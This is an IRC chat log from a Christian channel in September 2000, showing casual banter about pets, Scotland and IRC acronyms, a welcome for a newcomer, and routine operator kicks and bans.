[00:15] gen-well good for them [00:15] friend going there though [00:15] they should get a cookie [00:15] but i'm not them [00:15] raid you know johnson? or just knoxville? [00:15] within a year they fall off the train per se [00:15] milligan is so full of crap [00:15] Vote4Bush: both. hehe [00:15] like half of the kids there smoke and drink [00:15] Vote4Bush: I went to johnson for a service contract; I'm one of the techs that fixes their stuff. [00:15] HotPink watch the language please [00:15] * HotPink watches [00:15] yep [00:16] there it is [00:16] crap? [00:16] heh [00:16] oh, alright. you probably met my uncle, he is dealing with most of that [00:16] whats wrong with that? [00:16] *** ironic^^ ([email protected]) has joined #Christian [00:16] yeah [00:16] *** satiaKat ([email protected]) has joined #Christian [00:16] i'm baffled too [00:16] anyway [00:16] how is it full.... hotpink? [00:16] how come you didnt say anything to me for using the lords name in vein?? [00:16] because they claim be strict [00:16] and all for god and not allowing that stuff [00:16] heh [00:16] thats more of a 'crime' then saying crap [00:17] and they just act like it doesn't happen [00:17] *** Colin^ sets mode: +b *!*generic@*.quik.com [00:17] *** gen|c0de was kicked by Colin^ (This random kick message was censored by popular request) [00:17] um [00:17] your such a hypocrite [00:17] did he just like... ask to be kicked? [00:17] that was so stuppid [00:17] *** Kozubchik ([email protected]) Quit (†[C-Script]† - www.C-Script.com and irc.C-Script.com) [00:17] *** Colin^ sets mode: +b *!piglet@*.mvn.net [00:17] *** HotPink was kicked by Colin^ (I'm only doing this because I care) [00:17] ;) [00:17] *** laura7 ([email protected]) Quit (Leaving) [00:17] arg [00:17] *** satiaKat ([email protected]) Quit (GOD IS AWSOME!!!..............ALL THE TIME!!!!) [00:18] whassup thumps [00:18] Vote4Bush: not much [00:19] see ya later thumps....bye room [00:19] *** YinsMom ([email protected]) has left #Christian [00:19] * PaganJoy hugs thumps till her has a Victorian cinched waistline [00:19] <PaganJoy> her = he [00:20] hahah pags [00:20] <Maverick> Scary. [00:20] *** newzeal ([email protected]) has left #Christian [00:20] night room, peace [00:20] *** Dovi-dude ([email protected]) has left #Christian [00:21] * thumps hugs pags till she ............sez yes [00:21] <PaganJoy> ooh la la [00:21] to what? [00:21] ;) [00:21] heh

[00:22] *** Re[D]eemd ([email protected]) Quit (Mental floss with God's Word daily to prevent truth decay!) [00:22] * Colin^ could do with a nice cup of tea [00:23] Hmmm [00:23] Thats actually a cute quit msg [00:23] * Vote4Bush boils some water for tea [00:24] except the idea of flossing one's brain doesn't sound so appealing [00:24] you'd probably.. damage something, I'm sure [00:24] lol [00:25] "Ow, my frontal lobe... *drool*" [00:25] * Pipetobak reaches into the breast pocket of his flannel shirt and extracts a well worn, and well appreciated briar pipe. Meticulously he fills the pipe with delightful crumbles of leaf and gripping the stem of the pipe with his teeth, he strikes a match. The creamy, dense, vanilla tinted smoke is rich and delightful and he inhales it deeply with relish as he glances about looking for interesting conversation. [00:26] hmmm [00:26] thumps can send you a home lobotomy kit to try rts [00:26] I have migraines alot as it is, I think that would make it worse. [00:26] <Maverick> Pipetobak: I'm sure those auto-scripts of yours get longer every time I see then. [00:26] shrug. [00:27] * thumps reaches for his sharp fork [00:27] Maverick: He does it to annoy you. ;p Everytime you complain, it grows by 2 lines. [00:27] <Maverick> LOL [00:27] <Maverick> Really Raid? [00:27] no hehe [00:27] Colin^: cool [00:27] but it sounded good didn't it? ;) [00:27] *** fitzfield ([email protected]) has joined #Christian [00:27] 'cause you know, I just have way too much brain [00:27] Pipetobak changes them often [00:28] *** ramdac ([email protected]) has joined #Christian [00:28] yesterday was one liner and I almost fainted [00:28] one liner? [00:28] *** Adar_Caan ([email protected]) Quit (NewYork-R.NY.US.Undernet.Org SantaClara.CA.US.Undernet.Org) [00:28] *** Jubei ([email protected]) Quit (NewYork-R.NY.US.Undernet.Org SantaClara.CA.US.Undernet.Org) [00:29] oh.. [00:29] never mind [00:29] * Vote4Bush blows everyone a kiss goodnight [00:29] *** Vote4Bush ([email protected]) Quit (Friends don't let friends vote democrat.) [00:29] *** Adar_Caan ([email protected]) has joined #Christian [00:29] Yes I do, Colin. To keep it interesting for all. [00:29] <Maverick> I can believe that. [00:29] <Maverick> The day he floods the channel for it Colin^, you should kick him;-) [00:29] *** Jubei ([email protected]) has joined #Christian [00:29] *** Jubei ([email protected]) Quit (Leaving) [00:30] *** Jubei1 ([email protected]) has joined #Christian [00:30] and break the silence or idle chat? [00:30] shh [00:30] <Jubei1> I say we idle chat [00:31] *** just_gal ([email protected]) Quit (#kingcoles #samarnon #kingcoles #samarnon #kingcoles #samarnon #kingcoles #samarnon #kingcoles #samarnon #kingcoles #samarnon #kingcoles #samarnon #kingcoles #s) [00:31] Why should I be kicked? I never flood the channel. [00:32] I merely send an image of me so you may better visualize me as you speak to me. [00:32] :o) [00:33] * Maverick checks out more Matrix sites. [00:33] *** Colin^ sets mode: -b *!*@supernal.godsey.net

[00:33] *** maiang ([email protected]) has joined #Christian [00:33] *** fitzfield ([email protected]) Quit (Ping timeout for fitzfield[202.78.95.104]) [00:33] <Maverick> Boy. [00:33] <Maverick> Its gone kinda quiet. [00:33] <Maverick> Am I lagged? [00:33] <Maverick> Or has everyone decided I am not worth listening to? [00:33] * Maverick decides about this. [00:33] *** LadyViv ([email protected]) has joined #Christian [00:33] *** logos3 sets mode: +b *!*@*.one.net.au [00:33] is chatting in message [00:33] *** LadyViv was kicked by logos3 (banned: ISP banned: Continued illegal activity by one user) [00:33] *** Colin^ sets mode: -o Colin^ [00:34] <Maverick> I canna find my glasses. [00:35] Mine are on my nose [00:35] *** ironic^^ ([email protected]) Quit (SoMEdAy, SomHoW, FaR bEyOuNd 2 DaY i WiLl FiNd ThE wAy 2 FiNd U bUt SoMeHoW tHrU tHe LoNlYnIghT i Will LiVe ThE In ThE dArK tHaT U r n2 My HeArt LoVe U .(.KATE)) [00:35] * rts is away: not here [00:35] *** rts ([email protected]) has left #Christian [00:35] *** Pipetobak ([email protected]) Quit (Leaving) [00:36] <Maverick> Oh my goodness I was lagged. [00:36] *** Pipetobak ([email protected]) has joined #Christian [00:36] wb pipe :) [00:37] <Maverick> Oh my goodness I was lagged. [00:37] *** sansan` ([email protected]) has joined #Christian [00:37] <Maverick> Why didn't anyone tell me? [00:37] <Maverick> huh? [00:37] <Maverick> :P [00:38] <Maverick> =) [00:38] *** FuNNy ([email protected]) has joined #Christian [00:38] *** fitzfield ([email protected]) has joined #Christian [00:39] *** eagles` ([email protected]) has joined #Christian [00:39] hi.. [00:39] hey eagles [00:39] <eagles`> hey Colin^... just sent you an icq lol [00:40] *** Dawn ([email protected]) has joined #Christian [00:40] colin?? [00:40] *** fitzfield ([email protected]) Quit (Broken pipe) [00:40] hi, i'm new to this site [00:41] <eagles`> hello Dawn... nice to meet you [00:41] *** [Mo]- ([email protected]) has joined #Christian [00:41] nice to meet you to eagles [00:42] hi dawn [00:42] hi FuNNy [00:42] <eagles`> you a Canadian, me an Ozzie Welsman, lol, who speaks a little French :) [00:42] hi [00:42] I am actually new to the whole IRC experience [00:43] Dawn: Welcome. [00:43] how r u dawn? [00:43] <eagles`> you are still welcome, happens to all of us at some stage :) [00:43] well.. I have to get up REALLY early [00:43] sigh sigh [00:43] <[Mo]-> i speak french [00:43] i am fine and how are you [00:43] on a saturday no less.. chat ya'll later [00:43] * Colin^ speaks french [00:43] *** Lanfear` ([email protected]) Quit (Leaving) [00:43] sigh, bye lan. [00:43] <eagles`> enchante, [Mo][00:43] <[Mo]-> hehe [00:43] <[Mo]-> who can really speak french here? [00:44] <eagles`> un petit peu, mais ne pas dans ce channel

[00:44] I only understand French when I hearit [00:44] *** thumps ([email protected]) has left #Christian [00:44] great [00:44] <eagles`> on parles Anglais ici :) [00:44] *** charisma ([email protected]) Quit (Why do people cry when they hear the word goodbye!!!!) [00:44] <Maverick> hey eagles` [00:44] Je parle francais mon ami [00:44] <maiang> hi egales [00:44] <maiang> hi eagles [00:44] <Jubei1> I'm a redneck commie saskatchewan hick :) [00:44] <eagles`> yo Maverick :) [00:44] <Jubei1> I don't speak french... but I can say "I loose" in ancient Greek :) [00:44] <eagles`> kewl [00:44] <Jubei1> I just started learning the language last week :) [00:44] <eagles`> hehe [00:45] <[Mo]-> a oui, hé bien c'est vraiment amusant a savoir Colin^ [00:45] <eagles`> this is why I come on to IRC, to chat and have a fun time [00:45] <Jubei1> Colin, I understood. Mo, you lost me :) [00:45] *** `Ash` ([email protected]) has joined #Christian [00:45] brb [00:45] <[Mo]-> :P [00:45] *** Colin^ ([email protected]) has left #Christian [00:45] Dawn: Just so you know, IRC is very addicting. :) [00:45] *** Colin^ ([email protected]) has joined #Christian [00:45] <maiang> bye [00:45] * eagles` remembers starting to learn german in school and the first words were vulgar when said in English [00:45] that i have heard and i can see why [00:45] <eagles`> I eat.... and father [00:46] *** X sets mode: +o Colin^ [00:46] <eagles`> oh dear dont kick me!!!!!!!!!!! [00:46] *** Colin^ sets mode: -b *!*[email protected].* [00:46] *** Colin^ sets mode: +b *!*@202.77.100.* [00:46] *** FuNNy was kicked by Colin^ (P.S. This doesn't mean we can't be friends) [00:46] can someone tell me what brb and :p means [00:46] <`Ash`> be right back [00:46] be right back [00:46] i know what lol means [00:46] <[Mo]-> k [00:46] :p is someone poking their tounge out [00:47] *** maiang ([email protected]) Quit (Yesterday is History...Tomorrow is Mystery..Today is a Gift..thats why its called " present "...Live it !!!) [00:47] <eagles`> brb is an acronym... be right back [00:47] thank you [00:47] <eagles`> asl often asked by filipinos, is age sex location [00:47] <eagles`> ctc is care to chat [00:47] oh lovely [00:47] <Jubei1> :) is something that is overused [00:47] <eagles`> rofl is rolling on the floor laughing [00:48] <eagles`> quite something to do in real life :)) [00:48] <eagles`> oh and rl is real life [00:48] <[Mo]-> lol [00:48] :oÞ [00:49] <eagles`> Dawn you are using mIRC like I am... they have a very good series of helps on their website and in their help files [00:49] <[Mo]-> and std is something to do [00:49] <eagles`> heh didnt know that! [00:49] <[Mo]-> lol [00:49] i should check out the help files, and i thank you for all your help [00:50] <eagles`> meant to add that much of the acronyms are in those help files [00:50] *** Colin^ sets mode: -bbb *!piglet@*.mvn.net *!*generic@*.quik.com *!*DIE@*.rcn.com [00:50] *** Colin^ sets mode: -o Colin^

[00:50] great to know [00:50] Dawn: and you can learn just by being in chat... it's fun. [00:50] *** `Ash` ([email protected]) has left #Christian [00:50] <eagles`> sure is [00:51] i watched a bit here and there to get the jist of it. [00:51] *** Icon ([email protected]) has joined #Christian [00:51] <eagles`> sometimes its boring, sometimes infuriating, but mostly it's great... and as Raid said, can become addictive very easily [00:51] <Maverick> Oh no. [00:51] *** gen|c0de ([email protected]) has joined #Christian [00:52] wb gen|c0de [00:52] crap. [00:52] i know i need to be careful, often i am not doing to much so this could become a habit that may not be to good [00:52] i was sitting there playing with identd [00:52] and i went hrm [00:52] dude its only a nick ban [00:52] regardless [00:52] *** Icon ([email protected]) has left #Christian [00:52] gen|c0de I removed the ban [00:52] <eagles`> Dawn you need to be careful to whom you give personal details because cyber stalking is a very realproblem [00:53] no you didnt [00:53] Yes I did kid [00:53] unless you di it just like 5 seconds ago [00:53] hi raid [00:53] I did [00:53] :) [00:53] *** Icon ([email protected]) has joined #Christian [00:53] gen|c0de: heh, hello ;p [00:53] i understand that, I knew someone who got into trouble [00:53] *** generic ([email protected]) has joined #Christian [00:53] ** Colin^ sets mode: -bbb *!piglet@*.mvn.net *!*generic@*.quik.com *!*DIE@*.rcn.com [00:53] (eagles`): meant to add that much of the acronyms are in those help files [00:53] *** Icon ([email protected]) Quit (Read error to Icon[idxwc07-08.idx.com.au]: EOF from client) [00:53] <eagles`> gen|c0de I wonder why you are arguing?you are in here... therefore no ban... as I see it [00:53] gen|c0de see it? [00:53] ah well you just did it a few minutes ago [00:54] this is me too [00:54] <eagles`> so what buddy? grrrrrrrr [00:54] Make one of them go generic [00:54] how does one get banned? [00:54] regardless, learn how to do bans correctly [00:54] better yet [00:54] <eagles`> very easily lol [00:54] *** X sets mode: +o Colin^ [00:54] <eagles`> here it comes [00:54] *** gen|c0de ([email protected]) has left #Christian [00:54] <eagles`> lol [00:54] lol [00:54] Thanks [00:54] *** generic ([email protected]) has left #Christian [00:55] *** generic ([email protected]) has joined #Christian [00:55] <eagles`> hmmm my script didnt pick up the clone [00:55] *** FlyGuy_38 ([email protected]) has joined #Christian [00:55] *** BassPlaye ([email protected]) has joined #Christian [00:55] Hey BassPlaye [00:55] hey i just realized my part message didnt come through [00:55] hi [00:55] <eagles`> hey the canuks are coming in fast

[00:55] Hello FlyGuy_38 [00:55] <eagles`> hi BassPlaye [00:55] you can go fuck yourtself cause i didnt want to be here anyways [00:55] *** generic ([email protected]) has left #Christian [00:55] hi [00:56] *** X sets mode: +o eagles` [00:56] <eagles`> i have word kick enabled [00:56] now now watch your language:) [00:56] *** rts ([email protected]) has joined #Christian [00:56] Hi rts [00:56] yo [00:56] <eagles`> hey rts [00:56] *** Colin^ sets mode: -o Colin^ [00:57] greetings [00:57] <eagles`> duh didnt mean to push you off the pole Colin^ [00:57] eagles` tis ok, I wanted to read a newsgroup [00:57] *** weird ([email protected]) has joined #Christian [00:58] <weird> oh oh i am there [00:58] *** JAA98 ([email protected]) has joined #Christian [00:58] <eagles`> Dawn you were asking about banning... we are pretty tolerant here excepyt with those who come in deliberately to make trouble [00:58] <weird> apologies peoples [00:59] i see, this is good:) [00:59] <PaganJoy> hi Dawn [00:59] Hi [01:00] <weird> i am not weird [01:00] i'm sure you're not [01:00] <Jubei1> Your name is misleading then :) [01:00] Dawn: Just play it cool and bans aren't something you'll have to worry about. [01:00] <Jubei1> Myself, I'm completely mad [01:00] <weird> its a mistaken story too long to tell [01:00] <eagles`> we have a three-strikes-and-you-are-out policy generally speaking, a "kick" to remove ppl, and finally on the third offence a ban which runs for 24 hours typically [01:01] *** Philip15 ([email protected]) has joined #Christian [01:01] <Jubei1> I play in large vats of jelly [01:01] <Jubei1> I scream at the top of my lungs [01:01] <weird> how do you mark? [01:01] <Jubei1> I live to laugh and be jolly [01:01] *** Philip15 ([email protected]) Quit (don't love me from what u intend or hope that I would be, and if ur only using me to feed ur fantasy, you're not really in love, so let me go, I must be free!!!) [01:01] <eagles`> Jubei1 sounds a sticky sort of situation to me :) [01:01] <Jubei1> and I stuff my face with fresh baked buns [01:01] <Jubei1> (I mean that in a totally non-sexual way) [01:02] *** Disconnected [01:02] * Raid is away since 01:02:26 - 09/09/2000 ( Auto-Away: Not here ) - Msgs will be saved. [01:02] *** Attempting to rejoin... #CHristian Cannot send to channel [01:02] * Raid has returned ( Auto-Away: Not here ) - on 01:02:29 @ 09/09/2000 - Away 0 minutes. [01:02] *** Rejoined channel #christian [01:02] *** Topic is 'Encourage each other daily. (Hebrews 3:13)' [01:02] *** Set by Beukeboom on Fri Sep 08 03:42:57 [01:02] -logos3- http://www.forchrist.net - channel website, for rules and other info. [01:02] <Jubei1> Once I was a philosophy major :) [01:02] <PaganJoy> wb Raid! [01:02] My isp has got to get that fixed. [01:02] <Jubei1> Once when my sanity was still intact [01:02] <weird> well no i don't know.... [01:03] <Jubei1> But then... oh poor fortune that is me... it cracked... it cracked... [01:03] <eagles`> hey the pagster didnt see you !!!!!!!!!!!!!!!!!!!!!!!!!! [01:03] * Jubei1 brays laughing uncontrollably

[01:03] <PaganJoy> eagles!! hiya!!!!!!!! :) [01:03] <eagles`> like a cuppa tea? [01:03] <PaganJoy> Jubei-- go "The Nanny"'s laugh down pat? ;) [01:03] <weird> yeah i would ta:) [01:03] <PaganJoy> mmm tea!! [01:04] <eagles`> Dawn there's also sounds linked to irc... does your computer have a sound card? [01:04] <Jubei1> Pagan> If it was... then I would be deranged, not merely mad [01:04] <weird> green preferable [01:04] *** sWeAtPeA ([email protected]) has joined #CHristian [01:04] <Jubei1> But I am mad you see, and I'm also nutty [01:04] <eagles`> if someone plays a sound your mirc can find, yours then plays the same one [01:04] * PaganJoy nods solemnly [01:04] <Jubei1> Which explains why women seem to like me with ice cream and other sweet things [01:04] * eagles` likes nutty.old navy expression for chocolate [01:04] <weird> yeah yeah i dont do wavs:) [01:04] i do not believe so. I am also new to the full extent of the computer world [01:05] <eagles`> thats fine:) [01:05] <eagles`> you know the diff between :) and :( ?? [01:05] <Jubei1> Whenever they see me they start shaking the cans, or scooping the tubs [01:05] yes [01:05] <Jubei1> They cover me, and then eat me all up [01:05] <Jubei1> Cause I'm nutty [01:05] * Jubei1 strolls around with a monacle and tophat [01:06] <Jubei1> See... completely nutty... *twirls his cane* [01:06] *** ^jer-bear ([email protected]) has joined #CHristian [01:06] i don't like being :( only :) [01:06] <weird> who are you asking this eagle?:):( [01:06] <eagles`> talking to Dawn who is new to IRC [01:06] <weird> oh [01:06] <weird> ok [01:07] <Jubei1> But I think I'm going to retire from being insane [01:07] <Jubei1> It is too much effort, too little pay [01:07] <eagles`> also Dawn in mirc you can use the TAB key to save typing a person's nickname... time saver... did you know that? It's called"nick complete" [01:07] <Jubei1> I'll miss those pretty blue things they give you to swallow at that nice place with men in white suits [01:07] <Jubei1> But I think I am ready to move on [01:07] <weird> huh [01:07] * eagles` holds the door open [01:08] <Jubei1> (Valium pills at the nuthouse) ;) [01:08] <weird> nice [01:08] *** CodePoet ([email protected]) has joined #CHristian [01:08] <weird> like nice [01:08] *** Ixithmm ([email protected]) Quit (Leaving) [01:08] <Jubei1> I wish I had MIRC, but instead I have a java applet [01:08] <Jubei1> Oops, accidently hit bold [01:08] I have heard of that, I'm just winging this ya know:) [01:08] mIRC sucks [01:08] :P [01:08] <weird> not a lot:) [01:09] <Jubei1> Well, to bed with I [01:09] <Jubei1> Goodnight all [01:09] *** Jubei1 ([email protected]) Quit (Leaving) [01:09] <eagles`> bye Jubeil [01:09] *** TacoMan ([email protected]) has joined #CHristian [01:10] <Maverick> Oh dear. [01:10] <eagles`> oh? [01:10] * eagles` wonders why isnt in her channel 2 [01:10] <weird> now you guys i have a question? [01:10] * eagles` changes nick to dumbo - all ears [01:11] <weird> IF

[01:11] <weird> if i want to join philosophy [01:11] *** FlyGuy_38 ([email protected]) has left #CHristian [01:11] <weird> and IF [01:12] <weird> if they think i am weird [01:12] *** Pipetobak ([email protected]) Quit (Ping timeout for Pipetobak[as4-dial22.flnt.mi.voyager.net]) [01:13] <weird> how come its ok for me to be in christian? [01:13] weird yes [01:13] <eagles`> missed the drift of the question, sorry [01:13] *** charisma ([email protected]) has joined #CHristian [01:13] <weird> the drift was obscure... true [01:13] *** Kenshin^^ ([email protected]) has joined #CHristian [01:13] weird no one can se you in #christian from another channel anyway, its set on secret [01:14] <eagles`> see up the top it says channel modes are +stn [01:14] <weird> not the point Colin^ [01:14] *** ^_John_^ ([email protected]) has joined #CHristian [01:14] <eagles`> secret, topics set by ops, no notices in [01:14] *** cierra ([email protected]) has joined #CHristian [01:14] <weird> oh ok what does that that mean? [01:14] *** charisma ([email protected]) has left #CHristian [01:14] <eagles`> secret means you dont show up on someone's /whois or on /names [01:15] <weird> oh [01:15] now i don't understand this secret stuff [01:15] *** [Mo]- ([email protected]) has left #CHristian (CaLiNe DE BoNnEs BiNnEs) [01:15] <eagles`> unless they are in the same secret channel [01:15] hi pags [01:15] weird so is the point " we think you are weird to be here ?? [01:15] :) [01:15] <eagles`> it is a protection, Dawn [01:15] *** ^_John_^ is now known as ^John^ [01:15] <PaganJoy> hi cierra :) [01:15] :) [01:15] HI ^John^ [01:15] hello cierra [01:15] hi colin [01:15] <weird> well i am but do you think so [01:15] <^John^> Hi ppl [01:15] <eagles`> yes, weird [01:15] yes, wierd [01:15] <weird> oh oh i am assuming my nick [01:16] weird yes [01:16] <eagles`> snap [01:16] <weird> good one.... [01:16] *** ^jer-bear ([email protected]) Quit (Leaving) [01:16] <weird> i luv it! [01:16] *** jamie^16 ([email protected]) has joined #CHristian [01:16] <eagles`> brb, afk a moment ( Dawn that means away from keyboard) [01:16] *** Kenshin^^ ([email protected]) Quit ((VirusScript 2øøø) GeT iT aT http://www.v2000.cjb.net/ and http://www.yasarozg.net/) [01:18] <weird> Scotish water is soft [01:18] <weird> t [01:18] weird its the Peat [01:18] <weird> aaaah [01:18] <weird> like carbonated? [01:19] THats why they make such good Scotch [01:19] <weird> the glens [01:19] The water is filtered by the Peat [01:19] <weird> aaaaah [01:19] <weird> well it is true [01:19] <weird> hair needs no conditioning [01:20] <PaganJoy> niters all

[01:20] * PaganJoy waves :) [01:20] *** PaganJoy ([email protected]) Quit (Umm.. where am I going, and what's with this handbasket??) [01:21] *** BassPlaye ([email protected]) Quit (Ping timeout for BassPlaye[cras58p137.navix.net]) [01:22] *** twile ([email protected]) has joined #CHristian [01:22] <weird> so subteranean water is not a secret [01:22] <weird> i just went there for the first time last month [01:22] *** bu2zard ([email protected]) has joined #CHristian [01:22] weird to the Highlands? [01:22] <eagles`> Dawn there's another one, bbiab be back in a bit [01:22] <weird> yes [01:22] *** Maverick ([email protected]) Quit (Ping timeout for Maverick[203-79-93-232.tnt11.paradise.net.nz]) [01:23] thanks [01:23] <weird> tho they liked me:) [01:23] *** bu2zard ([email protected]) Quit (Leaving) [01:23] *** sWeAtPeA ([email protected]) has left #CHristian (havoc.(r)oots.(r)adical) [01:23] <weird> thing i liked also was highland bands..... [01:24] <weird> like there was this dutch highland band [01:24] <weird> in kilts [01:24] *** danimal ([email protected]) has joined #CHristian [01:25] <weird> nice tooo [01:25] <weird> i like a look of the kilt [01:25] <weird> but [01:25] * rts is away: not here [01:25] <weird> dutch? [01:25] *** rts ([email protected]) has left #CHristian [01:25] eagles` thanx for all the info and your time out to let me know what things mean [01:25] <eagles`> we have highland bands here in Austrlai too - on the plains, lol [01:26] <eagles`> thats fine, look forward to seeing you again :) [01:26] <eagles`> take care, God bless you [01:26] Irish play the bagpipes as well [01:26] <weird> and pipes [01:26] Thanx and God Bless:) [01:26] <weird> and harps [01:26] <eagles`> yeah, they gave the Scots them as a present, and the Sciots havent seen the joke yet,lol [01:27] *** Dawn ([email protected]) has left #CHristian [01:27] <weird> eagles that wasnt funny:( [01:27] <eagles`> lol [01:27] * eagles` actually loves pipe bands [01:27] <weird> so oh ok goodie:) [01:27] <eagles`> [01:28] I like Pipebands as well, I can still sing Scotland the brave [01:28] <eagles`> the first time I ever heard Amazing Grace it was played by a pipe band [01:28] * weird just sings psalms [01:28] <weird> well psalters [01:28] eagles` Paul mccartney did a bagpipe version, remember that? [01:28] <eagles`> that would be about 1968 [01:28] <weird> but is not weird [01:29] *** Bond-007 ([email protected]) has joined #CHristian [01:29] <eagles`> no, I don't. I remember a single released while I was working at the TV station at Bunbury [01:29] Hi Bond-007 [01:29] <weird> mull of kintire [01:29] Wooo!! GO GOLDEN BEARS! [01:29] weird yep [01:29] <eagles`> thats beautiful too [01:29] <weird> yeah.....soooo gooood [01:29] Bond-007 Gummy bears?

[01:29] Just went to my high school's football game. We kicked the crud out of the other team :) [01:29] No! Golden Bears!! :) [01:29] woo hoo [01:29] bond [01:30] *** tree` ([email protected]) has joined #CHristian [01:30] <weird> i play mull of kintire on the pianee [01:30] <weird> ten fingers [01:30] * Colin^ prefers Gummy Bears [01:30] * Bond-007 plays Nirvana in honor of the TVHS Bears [01:30] hehe Colin [01:31] <weird> mix and match [01:31] * eagles` forgets what he came on line to do [01:31] <eagles`> grrrrrr [01:31] <weird> so (bite me) [01:32] * weird asks what Christian means? [01:32] It feels so nice to sit in this chair compared to the metal benches [01:32] Someone who follows Jesus Christ's teachings is the technical term [01:32] *** Maverick ([email protected]) has joined #CHristian [01:32] !seen ricky77 [01:32] Hi Maverick [01:33] !seen danimal [01:33] <weird> i like this room [01:33] <eagles`> weird it is an expression first used at Antioch on the Palestinian coast around 70AD meaning those who follow Christ... initially a term of derision some folk will tell you [01:33] <Maverick> Hi=) [01:33] danimal was last on IRC channel #christian 8 minutes ago.] [01:34] <eagles`> #Christian is a channel run by a number of Christians who are happy for anyone to come in and chat as long as they dont try and me nasty [01:34] thanks colin [01:34] <weird> b [01:34] <eagles`> yeah typo [01:34] <weird> yeah :) [01:35] <weird> i have a dog called Solomon [01:35] <weird> same deal [01:35] * Colin^ has a Cat called MrJordan Big Eyes [01:35] *** cierra ([email protected]) has left #CHristian [01:35] <eagles`> how is MrJordonBigEyes? [01:35] -> *cierra* I think I know you from a long time ago? [01:35] <weird> well my dog is a rottweiler [01:36] JordAn [01:36] :) [01:36] *** konfused ([email protected]) has joined #CHristian [01:36] <eagles`> hey!!!!!! konfused [01:36] eagles` he hasn't been in today, but his wonderings are going to be nipped in the bud soon [01:36] ;o) [01:36] hello [01:37] <eagles`> lol [01:37] My cats name is "Bug" well, it's "Sir red rusty bug." or, Bug for short ;p [01:37] <eagles`> that seems to be what gets him into trouble [01:37] :o) [01:37] <weird> my cat is named jancy [01:37] *** Eponine` ([email protected]) has joined #CHristian [01:37] Raid have you seen my cats pic online yet? [01:37] *** Disconnected [01:37] * Raid is away since 01:37:58 - 09/09/2000 ( Auto-Away: Not here ) - Msgs will be saved. [01:37] *** Attempting to rejoin... #CHristian Cannot send to channel [01:38] * Raid has returned ( Auto-Away: Not here ) - on 01:38:01 @ 09/09/2000 - Away 0 minutes.

[01:38] [01:38] [01:38] [01:38] [01:38] [01:38] [01:38] [01:38] [01:38] [01:38] [01:38] [01:38] [01:38] [01:38] [01:39] [01:39] [01:39] [01:39] [01:39] [01:39] [01:39] [01:39] [01:39] [01:40] [01:40] [01:40] [01:40] [01:40] [01:40] [01:40] [01:40] [01:40] [01:40] [01:40] [01:40] [01:41] [01:41] [01:41] [01:41] [01:41] [01:41] [01:41] [01:41] [01:41] [01:42] [01:42] [01:42] [01:42] [01:42] [01:42] [01:42] [01:42] [01:42] [01:42] [01:42] [01:42] [01:42] [01:42] [01:42] [01:42] [01:42] [01:43] [01:43]

*** Rejoined channel #christian *** Topic is 'Encourage each other daily. (Hebrews 3:13)' *** Set by Beukeboom on Fri Sep 08 03:42:57 and a bunch of fish that I havent named :) -logos3- http://www.forchrist.net - channel website, for rules and other info. * eagles` sends for the plumber <Eponine`> I have 3 cats, Chloe, Furby and Sootie Furby :) <weird> i had a dog called chloe once furbies? those evil owl looking things? * Maverick has no cats. <Eponine`> yep :) * weird has no donkeys those scare me :\ <Eponine`> Furby is really fat and ORANGE and he purrs so loud i dont have a donkey either :( <Eponine`> ooh my furby doesn't scare anyone :) i gots a kitty tho Maverick Sophie is having kittens want one? *** sansan` ([email protected]) has left #CHristian <Eponine`> wish i had a pic scanned you wouldn't be scared:) <weird> i dooooo but i cant heh <Eponine`> I call him Furr for short :) my friend calls him furrball well, i guess as long as u can take your cat's batteries out *** Wildernes ([email protected]) has joined #CHristian <Eponine`> heheheehe Hey Wildernes my kittie is mean :\ <Wildernes> hey colin <Eponine`> ooh i have a mean kitty too konfused =^¡^= <Eponine`> Chloe is a mean cow of a thing :) it waits at the stairs.. and jumps out at u and bites.. an it hurteses <weird> nice one Colin <eagles`> lol * weird is impressed he's our little stair troll <Eponine`> hahaha konfused <Eponine`> mine comes up to you and smooches and purrs and rubs against your legs <Eponine`> then when you pat her she bites really hard <Eponine`> draws blood sometimes <Eponine`> im trying to give her away :P my cat doesnt do that :\ he only walks up to bite you <Eponine`> she was a nice cat until I got furby, i think she got jealous * Colin^ 's Cat can ride a bike, and makes me dinner <Eponine`> and has never gotten over it hmmm. heres a great quote: "Christians are losers." -Ted Turner <Eponine`> LOL Colin makes you dinner???? <Eponine`> Ted Turner must suck then :P oh! i want your cat colin Eponine` ;o) Ted Turner is not that big at thinking up memorable things to say is he? does he clean the house too? * eagles` wonders Ted Turner... CNN?? konfused I have his pics on my web page <Eponine`> Colin i'll trade you for Chloe? Ted Turner owns Superstation etc He owns alot of cable channels <weird> =^!^= He owns the Atlanta Braves

[01:43] is he cooking in the pics? [01:43] <weird> not the same [01:43] <Eponine`> :o :o =^.^= :o :o [01:43] *** Belle707 ([email protected]) has joined #CHristian [01:43] bond if it is not so memorable then why are you quoteing it? [01:43] <eagles`> superstation is big in europe [01:43] * Belle707 sighs ... cant sleep. [01:43] <eagles`> i watched a bit of it when I was in Sweden oooh 10 years ago [01:43] <Eponine`> ,,,=^.^=,,, <-- that is Chloe [01:43] http://mysite.xtra.co.nz/~ColinRHopper/page3.html <---Our cats pics [01:43] *** Jewelz`` ([email protected]) has joined #CHristian [01:44] <eagles`> hello Belle707 :)) [01:44] heh thats not my kitty he doesnt have clawses [01:44] <Wildernes> hey belle [01:44] <Eponine`> i will look at them collie [01:44] hey Wildernes [01:44] *** TallCaMan ([email protected]) has joined #CHristian [01:44] Hi Belle707 [01:44] danimal: because I just saw it on a website [01:44] <weird> =^{}^= [01:44] <weird> aaaaak [01:44] It was an atheist and scoffer quote page [01:45] We spend the first [01:45] to walk and talk and the next twelve telling them to sit down and shut up. [01:45] --Phyllis Diller [01:45] hehehe [01:45] <weird> how do ya turn stuff ? [01:45] <^John^> Colin^ it says your page is down :/ [01:45] <Eponine`> collie: are those kitten photos recent? [01:45] so what is the purpose to quote him? [01:45] <Eponine`> the orange one looks like furby :) [01:45] *** twile ([email protected]) Quit (Ping timeout for twile[207.0.112.77]) [01:45] Eponine` one of them is a cat now [01:45] <^John^> I went there cuz I love kittens [01:45] Oh! cute little kitty kats [01:45] danimal: to show how ignorant some people are [01:46] <^John^> Hey how are u ppl getting it to load [01:46] *** Twinsen ([email protected]) has joined #CHristian [01:46] Have a look at Mr Jordan Big Eyes [01:46] <Eponine`> Colin did you keep any of them? [01:46] <Eponine`> John try to refresh it? [01:46] Eponine` yes one of the cameo one [01:46] what makes him ignore by that quote [01:46] hate‚ignorance [01:46] *** cierra ([email protected]) has joined #CHristian [01:47] thinking that Christians are Losers. Its a broad vague ignorant statement. [01:47] Colin^: HEHEHE, nice kitty ;p [01:47] how is it ignorant? [01:47] Raid he is a great cat [01:48] <Wildernes> bond: but never 